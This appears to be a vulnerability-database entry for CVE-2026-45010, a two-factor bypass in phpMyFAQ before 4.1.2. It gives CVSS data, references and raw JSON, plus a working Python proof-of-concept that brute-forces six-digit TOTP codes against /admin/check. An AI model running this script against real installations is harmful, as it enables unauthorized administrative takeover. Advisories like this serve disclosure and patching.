Security Vulnerability Report
CVE-2026-45010 CVSS 9.1 CRITICAL

Published: 2026-05-15 19:17:01
Last Modified: 2026-05-15 23:16:21

Description

phpMyFAQ before 4.1.2 contains an improper restriction of excessive authentication attempts vulnerability in the /admin/check endpoint, which accepts arbitrary user-id parameters without session binding or rate limiting. Unauthenticated attackers can brute-force any user's six-digit TOTP code by submitting POST requests with sequential token values, bypassing two-factor authentication to gain full administrative access.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

phpMyFAQ < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

target_url = "http://target-site/admin/check"
user_id = "1"
headers = {
    "User-Agent": "PoC-Scanner/1.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

print(f"[*] Starting brute force for user {user_id}...")

# Iterate through all 6-digit combinations
for code in range(1000000):
    totp_code = f"{code:06d}"
    data = {
        "userid": user_id,
        "totp": totp_code
    }
    try:
        # Send POST request to the vulnerable endpoint
        response = requests.post(target_url, data=data, headers=headers, timeout=2)
        # Check response for indicators of success (e.g., 200 OK with specific text or redirect)
        # Adjust condition based on actual application response
        if response.status_code == 200 and "success" in response.text.lower():
            print(f"[+] Valid TOTP code found: {totp_code}")
            print(f"[+] Admin access granted!")
            break
        elif response.status_code == 302:
            print(f"[+] Potential success with 302 Redirect using code: {totp_code}")
            break
    except requests.exceptions.RequestException:
        pass
    if code % 10000 == 0:
        print(f"[*] Progress: {code} codes tested.")
```

References

https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9pq7-mfwh-xx2j
https://www.vulncheck.com/advisories/phpmyfaq-unauthenticated-two-factor-authentication-brute-force-via-admin-check-endpoint

Weakness: CWE-307 (Improper Restriction of Excessive Authentication Attempts)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-45010",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T19:17:01.450",
    "lastModified": "2026-05-15T23:16:20.927",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "phpMyFAQ before 4.1.2 contains an improper restriction of excessive authentication attempts vulnerability in the /admin/check endpoint, which accepts arbitrary user-id parameters without session binding or rate limiting. Unauthenticated attackers can brute-force any user's six-digit TOTP code by submitting POST requests with sequential token values, bypassing two-factor authentication to gain full administrative access."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-307"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9pq7-mfwh-xx2j",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vulncheck.com/advisories/phpmyfaq-unauthenticated-two-factor-authentication-brute-force-via-admin-check-endpoint",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9pq7-mfwh-xx2j",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```